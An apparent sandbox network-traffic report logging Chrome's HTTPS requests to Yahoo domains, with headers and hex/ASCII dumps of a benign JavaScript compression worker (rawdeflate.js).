                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 05 16 a5 b4 ac 96 e4 47 56 03 8c b8 90 46 e4 29 39 04 7e 23 04 66 ab 6e 92 69 8e 84 b6 1d 95 aa ec d3 e4 e9 88 ee db 5a 76 45 b2 7a 9b 71 b7 b2 55 e0 21 49 2a 29 70 81 82 49 38 4a bb 28 0c f0 42 92 9c df 8d 25 2c 9a 3b 4b a8 5c 2c 33 9d a3 f4 8b 52 3b a8 a6 58 64 cb 8c e2 9e 8e 27 a2 5a 58 0f 20 b1 e3 94 85 a8 60 a9 23 3d f0 0f 07 07 20 d5 93 ac d7 18 01 e2 27 5f b0 ba e7 d1 6b b0 b3 3d 18 ea 68 97 09 ed a3 74 68 b6 e8 cd 32 a7 1c 03 18 51 42 12 ac 7b 77 ef c1 e6 9b ef 49 be 89 7f 4c 4f b6 10 69 9e 9f 35 61 8f 02 ca f5 81 8b d5 e6 4b 4d c6 6d 95 b6 95 97 a5 2d 69 04 0c ff 00 0a 46 ee 78 00 77 c0 19 a8 f2 ad 51 bc 25 c0 ae da de da 3c b2 b0 eb 94 cb 73 d3 da d1 3a 62 cd 01 2d 69 85 bc 89 b3 a3 36 94 7d b2 5b 85 3e 32 93 81 fe 12 3c 34 b6 81 8c fc aa 57 1b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: GVF)9~#fniZvEzqU!I*)pI8J(B%,;K\,3R;Xd'ZX `#= '_k=hth2QB{wILOi5aKMm-iFxwQ%<s:b-i6}[>2<4W


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              61192.168.2.45108187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC857OUTGET /__rapid-worker-1.2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: rlUKVs3+GuPXM8s4tqQ362vzVM867Ibpq5TMF93Yes217c7bAHg7gVdDUoKnczMv+8ZkZDX8muo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: Q21BN773NT4D1V8W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 11 Sep 2024 05:52:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 06 Mar 2018 20:46:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "e2202e6ed6ef52cec2c4a875c99225ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-created-date: Wed, 15 Oct 2014 18:48:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-mbst-etag: "YM:1:e64293ae-a913-4bb2-8dd1-87431f3be4230005057a946243f1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-x-ysws-mbst-vtime: 1413398917170161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: Sat, 05 Sep 2026 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-x-ysws-access: public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2380851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 24 49 64 3a 20 72 61 77 64 65 66 6c 61 74 65 2e 6a 73 2c 76 20 30 2e 33 20 32 30 30 39 2f 30 33 2f 30 31 20 31 39 3a 30 35 3a 30 35 20 64 61 6e 6b 6f 67 61 69 20 45 78 70 20 64 61 6e 6b 6f 67 61 69 20 24 0a 20 2a 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 3a 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 69 63 6f 73 2e 63 6f 6d 2f 73 74 61 66 66 2f 69 7a 2f 61 6d 75 73 65 2f 6a 61 76 61 73 63 72 69 70 74 2f 65 78 70 65 72 74 2f 64 65 66 6c 61 74 65 2e 74 78 74 0a 20 2a 2f 0a 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 39 20 4d 61 73 61 6e 61 6f 20 49 7a 75 6d 6f 20 3c 69 7a 40 6f 6e 69 63 6f 73 2e 63 6f 2e 6a 70 3e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /* @preserve * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $ * * Original: * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt *//* @preserve * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp> * Version:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 65 72 72 6f 72 3a 20 7a 69 70 5f 57 53 49 5a 45 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 22 29 2c 5f 3e 64 2d 31 26 26 70 6f 73 74 4d 65 73 73 61 67 65 28 22 65 72 72 6f 72 3a 20 7a 69 70 5f 48 41 53 48 5f 42 49 54 53 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 22 29 2c 28 38 3e 5f 7c 7c 32 35 38 21 3d 68 29 26 26 70 6f 73 74 4d 65 73 73 61 67 65 28 22 65 72 72 6f 72 3a 20 43 6f 64 65 20 74 6f 6f 20 63 6c 65 76 65 72 22 29 3b 76 61 72 20 76 2c 79 2c 77 2c 6d 2c 67 2c 78 2c 62 2c 70 2c 4d 2c 43 2c 42 2c 7a 2c 49 2c 52 2c 58 2c 44 2c 6a 2c 6b 2c 4e 2c 53 2c 48 2c 55 2c 5a 2c 45 2c 46 2c 54 2c 57 2c 71 2c 47 2c 4a 2c 4b 2c 4c 2c 4f 2c 50 2c 51 2c 56 2c 59 2c 24 2c 72 74 2c 74 74 2c 65 74 2c 6e 74 2c 66 74 2c 6f 74 2c 69 74 2c 61 74 2c 6c 74 2c 75 74 2c 73 74 2c 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: error: zip_WSIZE is too large"),_>d-1&&postMessage("error: zip_HASH_BITS is too large"),(8>_||258!=h)&&postMessage("error: Code too clever");var v,y,w,m,g,x,b,p,M,C,B,z,I,R,X,D,j,k,N,S,H,U,Z,E,F,T,W,q,G,J,K,L,O,P,Q,V,Y,$,rt,tt,et,nt,ft,ot,it,at,lt,ut,st,c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 3d 21 31 2c 5a 3d 21 31 2c 6e 75 6c 6c 3d 3d 46 74 29 7b 66 6f 72 28 76 3d 79 3d 77 3d 6e 75 6c 6c 2c 46 74 3d 41 72 72 61 79 28 75 29 2c 70 3d 41 72 72 61 79 28 73 29 2c 4d 3d 41 72 72 61 79 28 77 74 29 2c 43 3d 41 72 72 61 79 28 61 2b 6c 29 2c 42 3d 41 72 72 61 79 28 31 3c 3c 64 29 2c 4a 3d 41 72 72 61 79 28 5a 74 29 2c 74 3d 30 3b 5a 74 3e 74 3b 74 2b 2b 29 4a 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4b 3d 41 72 72 61 79 28 32 2a 6b 74 2b 31 29 2c 74 3d 30 3b 32 2a 6b 74 2b 31 3e 74 3b 74 2b 2b 29 4b 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4c 3d 41 72 72 61 79 28 6a 74 2b 32 29 2c 74 3d 30 3b 6a 74 2b 32 3e 74 3b 74 2b 2b 29 4c 5b 74 5d 3d 6e 65 77 20 54 74 3b 66 6f 72 28 4f 3d 41 72 72 61 79 28 6b 74 29 2c 74 3d 30 3b 6b 74 3e 74 3b 74 2b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =!1,Z=!1,null==Ft){for(v=y=w=null,Ft=Array(u),p=Array(s),M=Array(wt),C=Array(a+l),B=Array(1<<d),J=Array(Zt),t=0;Zt>t;t++)J[t]=new Tt;for(K=Array(2*kt+1),t=0;2*kt+1>t;t++)K[t]=new Tt;for(L=Array(jt+2),t=0;jt+2>t;t++)L[t]=new Tt;for(O=Array(kt),t=0;kt>t;t++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 5a 3d 21 31 3b 4d 74 3e 45 26 26 21 5a 3b 29 73 65 28 29 3b 66 6f 72 28 58 3d 30 2c 72 3d 30 3b 63 2d 31 3e 72 3b 72 2b 2b 29 58 3d 28 58 3c 3c 45 74 5e 32 35 35 26 70 5b 72 5d 29 26 67 74 7d 2c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 74 2c 65 2c 6e 3d 46 2c 66 3d 48 2c 6f 3d 53 2c 61 3d 48 3e 43 74 3f 48 2d 43 74 3a 62 74 2c 6c 3d 48 2b 68 2c 75 3d 70 5b 66 2b 6f 2d 31 5d 2c 73 3d 70 5b 66 2b 6f 5d 3b 53 3e 3d 71 26 26 28 6e 3e 3e 3d 32 29 3b 64 6f 20 69 66 28 74 3d 72 2c 70 5b 74 2b 6f 5d 3d 3d 73 26 26 70 5b 74 2b 6f 2d 31 5d 3d 3d 75 26 26 70 5b 74 5d 3d 3d 70 5b 66 5d 26 26 70 5b 2b 2b 74 5d 3d 3d 70 5b 66 2b 31 5d 29 7b 66 2b 3d 32 2c 74 2b 2b 3b 64 6f 3b 77 68 69 6c 65 28 70 5b 2b 2b 66 5d 3d 3d 70 5b 2b 2b 74 5d 26 26 70 5b 2b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z=!1;Mt>E&&!Z;)se();for(X=0,r=0;c-1>r;r++)X=(X<<Et^255&p[r])&gt},ue=function(r){var t,e,n=F,f=H,o=S,a=H>Ct?H-Ct:bt,l=H+h,u=p[f+o-1],s=p[f+o];S>=q&&(n>>=2);do if(t=r,p[t+o]==s&&p[t+o-1]==u&&p[t]==p[f]&&p[++t]==p[f+1]){f+=2,t++;do;while(p[++f]==p[++t]&&p[++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 5a 7c 7c 28 7a 3d 30 2c 49 3d 30 2c 76 65 28 29 2c 6c 65 28 29 2c 79 3d 6e 75 6c 6c 2c 67 3d 30 2c 78 3d 30 2c 6b 3d 30 2c 33 3e 3d 57 3f 28 53 3d 63 2d 31 2c 4e 3d 30 29 3a 28 4e 3d 63 2d 31 2c 6b 3d 30 2c 6b 3d 30 29 2c 62 3d 21 31 29 7d 2c 41 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 6d 7c 7c 28 64 65 28 29 2c 6d 3d 21 30 2c 30 21 3d 45 29 3f 28 6e 3d 5f 65 28 72 2c 74 2c 65 29 29 3d 3d 65 3f 65 3a 62 3f 6e 3a 28 33 3e 3d 57 3f 63 65 28 29 3a 68 65 28 29 2c 30 3d 3d 45 26 26 28 30 21 3d 6b 26 26 7a 65 28 30 2c 32 35 35 26 70 5b 48 2d 31 5d 29 2c 42 65 28 31 29 2c 62 3d 21 30 29 2c 6e 2b 5f 65 28 72 2c 6e 2b 74 2c 65 2d 6e 29 29 3a 28 62 3d 21 30 2c 30 29 7d 2c 5f 65 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: function(){Z||(z=0,I=0,ve(),le(),y=null,g=0,x=0,k=0,3>=W?(S=c-1,N=0):(N=c-1,k=0,k=0),b=!1)},Ae=function(r,t,e){var n;return m||(de(),m=!0,0!=E)?(n=_e(r,t,e))==e?e:b?n:(3>=W?ce():he(),0==E&&(0!=k&&ze(0,255&p[H-1]),Be(1),b=!0),n+_e(r,n+t,e-n)):(b=!0,0)},_e=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 44 65 28 72 2c 35 29 3b 79 65 28 29 7d 7d 2c 79 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 30 3b 6a 74 3e 72 3b 72 2b 2b 29 4a 5b 72 5d 2e 66 63 3d 30 3b 66 6f 72 28 72 3d 30 3b 6b 74 3e 72 3b 72 2b 2b 29 4b 5b 72 5d 2e 66 63 3d 30 3b 66 6f 72 28 72 3d 30 3b 4e 74 3e 72 3b 72 2b 2b 29 50 5b 72 5d 2e 66 63 3d 30 3b 4a 5b 44 74 5d 2e 66 63 3d 31 2c 41 74 3d 5f 74 3d 30 2c 75 74 3d 73 74 3d 63 74 3d 30 2c 68 74 3d 30 2c 64 74 3d 31 7d 2c 77 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 72 74 5b 74 5d 2c 6e 3d 74 3c 3c 31 3b 74 74 3e 3d 6e 26 26 28 74 74 3e 6e 26 26 69 65 28 72 2c 72 74 5b 6e 2b 31 5d 2c 72 74 5b 6e 5d 29 26 26 6e 2b 2b 2c 21 69 65 28 72 2c 65 2c 72 74 5b 6e 5d 29 29 3b 29 72 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: De(r,5);ye()}},ye=function(){var r;for(r=0;jt>r;r++)J[r].fc=0;for(r=0;kt>r;r++)K[r].fc=0;for(r=0;Nt>r;r++)P[r].fc=0;J[Dt].fc=1,At=_t=0,ut=st=ct=0,ht=0,dt=1},we=function(r,t){for(var e=rt[t],n=t<<1;tt>=n&&(tt>n&&ie(r,rt[n+1],rt[n])&&n++,!ie(r,e,rt[n]));)rt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 74 5b 65 5d 2b 31 3f 6e 74 5b 74 5d 3a 6e 74 5b 65 5d 2b 31 2c 6e 5b 74 5d 2e 64 6c 3d 6e 5b 65 5d 2e 64 6c 3d 61 2c 72 74 5b 42 74 5d 3d 61 2b 2b 2c 77 65 28 6e 2c 42 74 29 3b 77 68 69 6c 65 28 74 74 3e 3d 32 29 3b 72 74 5b 2d 2d 65 74 5d 3d 72 74 5b 42 74 5d 2c 6d 65 28 72 29 2c 67 65 28 6e 2c 69 29 7d 2c 62 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 76 61 72 20 65 2c 6e 2c 66 3d 2d 31 2c 6f 3d 72 5b 30 5d 2e 64 6c 2c 69 3d 30 2c 61 3d 37 2c 6c 3d 34 3b 66 6f 72 28 30 3d 3d 6f 26 26 28 61 3d 31 33 38 2c 6c 3d 33 29 2c 72 5b 74 2b 31 5d 2e 64 6c 3d 36 35 35 33 35 2c 65 3d 30 3b 74 3e 3d 65 3b 65 2b 2b 29 6e 3d 6f 2c 6f 3d 72 5b 65 2b 31 5d 2e 64 6c 2c 61 3e 2b 2b 69 26 26 6e 3d 3d 6f 7c 7c 28 6c 3e 69 3f 50 5b 6e 5d 2e 66 63 2b 3d 69 3a 30 21 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t[e]+1?nt[t]:nt[e]+1,n[t].dl=n[e].dl=a,rt[Bt]=a++,we(n,Bt);while(tt>=2);rt[--et]=rt[Bt],me(r),ge(n,i)},be=function(r,t){var e,n,f=-1,o=r[0].dl,i=0,a=7,l=4;for(0==o&&(a=138,l=3),r[t+1].dl=65535,e=0;t>=e;e++)n=o,o=r[e+1].dl,a>++i&&n==o||(l>i?P[n].fc+=i:0!=n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 29 2c 64 74 3c 3c 3d 31 2c 30 3d 3d 28 37 26 75 74 29 26 26 28 6c 74 5b 63 74 2b 2b 5d 3d 68 74 2c 68 74 3d 30 2c 64 74 3d 31 29 2c 57 3e 32 26 26 30 3d 3d 28 34 30 39 35 26 75 74 29 29 7b 76 61 72 20 65 2c 6e 3d 38 2a 75 74 2c 66 3d 48 2d 52 3b 66 6f 72 28 65 3d 30 3b 6b 74 3e 65 3b 65 2b 2b 29 6e 2b 3d 4b 5b 65 5d 2e 66 63 2a 28 35 2b 4b 74 5b 65 5d 29 3b 69 66 28 6e 3e 3e 3d 33 2c 70 61 72 73 65 49 6e 74 28 75 74 2f 32 29 3e 73 74 26 26 70 61 72 73 65 49 6e 74 28 66 2f 32 29 3e 6e 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 20 75 74 3d 3d 41 2d 31 7c 7c 73 74 3d 3d 77 74 7d 2c 49 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 74 29 7b 76 61 72 20 65 2c 6e 2c 66 2c 6f 2c 69 3d 30 2c 61 3d 30 2c 6c 3d 30 2c 75 3d 30 3b 69 66 28 30 21 3d 75 74 29 64 6f 20 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ),dt<<=1,0==(7&ut)&&(lt[ct++]=ht,ht=0,dt=1),W>2&&0==(4095&ut)){var e,n=8*ut,f=H-R;for(e=0;kt>e;e++)n+=K[e].fc*(5+Kt[e]);if(n>>=3,parseInt(ut/2)>st&&parseInt(f/2)>n)return!0}return ut==A-1||st==wt},Ie=function(r,t){var e,n,f,o,i=0,a=0,l=0,u=0;if(0!=ut)do 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 4d 3d 41 72 72 61 79 28 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 2c 31 2c 31 2c 31 2c 32 2c 32 2c 32 2c 32 2c 33 2c 33 2c 33 2c 33 2c 34 2c 34 2c 34 2c 34 2c 35 2c 35 2c 35 2c 35 2c 30 2c 39 39 2c 39 39 29 2c 43 3d 41 72 72 61 79 28 31 2c 32 2c 33 2c 34 2c 35 2c 37 2c 39 2c 31 33 2c 31 37 2c 32 35 2c 33 33 2c 34 39 2c 36 35 2c 39 37 2c 31 32 39 2c 31 39 33 2c 32 35 37 2c 33 38 35 2c 35 31 33 2c 37 36 39 2c 31 30 32 35 2c 31 35 33 37 2c 32 30 34 39 2c 33 30 37 33 2c 34 30 39 37 2c 36 31 34 35 2c 38 31 39 33 2c 31 32 32 38 39 2c 31 36 33 38 35 2c 32 34 35 37 37 29 2c 42 3d 41 72 72 61 79 28 30 2c 30 2c 30 2c 30 2c 31 2c 31 2c 32 2c 32 2c 33 2c 33 2c 34 2c 34 2c 35 2c 35 2c 36 2c 36 2c 37 2c 37 2c 38 2c 38 2c 39 2c 39 2c 31 30 2c 31 30 2c 31 31 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: M=Array(0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,99,99),C=Array(1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577),B=Array(0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              62192.168.2.45108287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC588OUTGET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: kCjh+Nv6RrtAH+gUu0B01pzggx6eBhwV/u7fXwHiscsn3R0e07ypphLIH7SYe8DkjZnGz2oIgtM=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 8SQRE7CC57V764QV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 07:31:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 22 Nov 2023 02:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "bcda778b736c3a054af62f437b536e78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 4nvcVa.IxmhX7xaj3DD1aoyDc2oHnofW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 474147
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
